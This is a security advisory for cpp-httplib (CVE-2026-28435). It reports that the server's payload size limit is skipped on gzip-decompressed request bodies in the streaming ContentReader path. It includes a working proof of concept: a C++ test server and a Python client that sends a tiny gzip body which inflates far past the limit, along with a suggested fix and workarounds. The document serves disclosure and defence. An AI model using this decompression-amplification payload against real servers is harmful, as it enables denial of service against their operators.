Skip to content

Payload size limit bypass via gzip decompression in ContentReader (streaming) allows oversized request bodies in cpp-httplib

High
yhirose published GHSA-xvfx-w463-6fpp Mar 2, 2026

Package

cpp-httplib

Affected versions

<= 0.34.0

Patched versions

0.35.0

Description

Summary

cpp-httplib (httplib.h) does not enforce Server::set_payload_max_length() on the decompressed request body when using HandlerWithContentReader (streaming ContentReader) with Content-Encoding: gzip (or other supported encodings). A small compressed payload can expand beyond the configured payload limit and be processed by the application, enabling a payload size limit bypass and potential denial of service (CPU/memory exhaustion).

This behavior is inconsistent with the non-streaming request body path (req.body), which rejects/limits oversized decompressed bodies.

Root Cause

The server request-body parsing path applies payload_max_length_ to the number of bytes read from the network (compressed bytes) inside detail::read_content_* functions. When decompress=true, detail::prepare_content_receiver wraps the receiver with a decompressor, but the size accounting/limit checks still track the compressed input length (e.g., n from the socket read), not the decompressed output length (n2 passed to the receiver after inflate).

Additionally, the decompressed-size protection ("zip bomb" guard) exists only when aggregating into req.body (non-streaming path). When applications use ContentReader (streaming), the receiver is application-provided, and no decompressed-size limit is enforced by the library.

Technical Flow (How the bypass happens)

  1. Server::routing() detects a request with a body and constructs a ContentReader.
  2. The streaming handler (HandlerWithContentReader) is matched and invoked via dispatch_request_for_content_reader(...).
  3. Inside the ContentReader callback, the library calls:
    • read_content_with_content_receiver(...)read_content_core(...)
    • which calls detail::read_content(strm, req, payload_max_length_, status, ..., out, decompress=true)
  4. detail::prepare_content_receiver(...) enables decompression and wraps the receiver:
    • read from socket → pass compressed bytes to decompressor
    • decompressor emits decompressed chunks to the application receiver
  5. The payload limit checks in read_content_with_length/chunked/without-length paths count the compressed bytes read from the socket, so a tiny compressed payload can inflate to a large decompressed stream and still be accepted.
  6. In contrast, the non-streaming path that builds req.body includes an explicit decompressed-size guard, so it rejects oversized decompressed bodies.

Impact

An attacker can send Content-Encoding: gzip with a very small compressed Content-Length (e.g., a few hundred bytes) that inflates to a much larger body (hundreds of KB/MB+). When the server endpoint uses HandlerWithContentReader, the application can receive and process decompressed data far beyond payload_max_length, enabling:

  • bypass of intended payload size policy,
  • increased CPU usage due to decompression work,
  • increased memory usage depending on application processing,
  • potential Denial of Service (DoS) in constrained environments or high concurrency.

Affected Configurations

  • Server-side usage of HandlerWithContentReader (Server::Post/Put/Patch/Delete overloads with ContentReader)
  • Request body decompression enabled via CPPHTTPLIB_ZLIB_SUPPORT and Content-Encoding: gzip (or another supported encoding)
  • Any deployment that relies on set_payload_max_length() as a security boundary for request body size

Proof of Concept (Reproduction)

Server (C++)

Build requires zlib (-lz) and CPPHTTPLIB_ZLIB_SUPPORT.

server64_strong.cpp

#define CPPHTTPLIB_ZLIB_SUPPORT
#include "httplib.h"
#include <iostream>
#include <cstddef>

static void print_line(const char* tag, bool ok, size_t got, size_t limit) {
  std::cout << tag
            << " ok=" << ok
            << " got=" << got
            << " payload_max_length=" << limit
            << std::endl;
}

int main() {
  httplib::Server svr;

  const size_t LIMIT = 64 * 1024; // 64KB
  svr.set_payload_max_length(LIMIT);

  // Non-streaming path (req.body). This rejects the same payload (400 in this version).
  svr.Post("/body", [LIMIT](const httplib::Request &req, httplib::Response &res) {
    print_line("[/body]", true, req.body.size(), LIMIT);
    res.status = 200;
    res.set_content("body_ok\n", "text/plain");
  });

  // Streaming path (ContentReader). This accepts and processes decompressed output > LIMIT.
  svr.Post("/stream",
           [LIMIT](const httplib::Request & /*req*/, httplib::Response &res,
                   const httplib::ContentReader &content_reader) {
             size_t total = 0;
             bool ok = content_reader([&](const char* /*data*/, size_t len) {
               total += len;   // len is decompressed bytes delivered to the callback
               return true;
             });

             print_line("[/stream]", ok, total, LIMIT);

             if (total > LIMIT) {
               std::cout << "[VULN] Decompressed body exceeded payload_max_length via ContentReader."
                         << std::endl;
             }

             res.status = 200;
             res.set_content("stream_ok\n", "text/plain");
           });

  svr.set_error_handler([](const httplib::Request&, httplib::Response &res) {
    std::cout << "[error] status=" << res.status << std::endl;
  });

  std::cout << "Listening on 127.0.0.1:18080" << std::endl;
  bool ok = svr.listen("127.0.0.1", 18080);
  std::cerr << "listen ok=" << ok << std::endl;
  return ok ? 0 : 1;
}

Build & run:

g++ -O2 -std=c++17 -pthread server64_strong.cpp -lz -o server64_strong
./server64_strong

Client (Python)

poc_gzip_strong.py

import gzip
import socket

HOST, PORT = "127.0.0.1", 18080

raw = b"A" * (256 * 1024)  # 256KB decompressed
gz = gzip.compress(raw, compresslevel=9)  # ~290 bytes compressed

def send(path: str):
    req = (
        f"POST {path} HTTP/1.1\r\n".encode() +
        b"Host: 127.0.0.1\r\n"
        b"Connection: close\r\n"
        b"Content-Encoding: gzip\r\n"
        b"Content-Length: " + str(len(gz)).encode() + b"\r\n"
        b"\r\n" + gz
    )

    s = socket.create_connection((HOST, PORT))
    s.sendall(req)

    resp = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        resp += chunk
    s.close()

    print("==== Response for", path, "====")
    print(resp.decode(errors="ignore"))

print("compressed =", len(gz), "bytes")
print("decompressed =", len(raw), "bytes")

send("/body")
send("/stream")

Run:

python3 poc_gzip_strong.py

Observed Results

  • The wire request shows a small compressed payload:

    • Content-Encoding: gzip
    • Content-Length: 290
  • /body rejects the request (400 Bad Request in this version/build).

  • /stream returns 200 OK and the server prints:

    • [/stream] ok=1 got=262144 payload_max_length=65536
    • [VULN] Decompressed body exceeded payload_max_length via ContentReader.

Expected Results

If set_payload_max_length(64KB) is configured, the server should reject any request whose effective body size after decompression exceeds 64KB, regardless of whether the application uses req.body or ContentReader.

Suggested Fix

Enforce payload_max_length_ on the decompressed output in the ContentReader / content receiver decompression path. Concretely:

  • Track total decompressed bytes emitted by the decompressor (e.g., decompressed_total).
  • If emitting the next chunk would exceed payload_max_length, abort and return 413 Payload Too Large (or equivalent), and stop further processing.

Mitigations / Workarounds

  • Do not enable request-body decompression for endpoints that use ContentReader (e.g., reject Content-Encoding headers on those endpoints).
  • Enforce a decompressed-size limit in the application callback (count bytes and abort once a cap is reached).
  • Avoid relying on payload_max_length as a strict boundary when using ContentReader with decompression.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2026-28435

Weaknesses

Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource. Learn more on MITRE.

Improper Handling of Highly Compressed Data (Data Amplification)

The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output. Learn more on MITRE.

Credits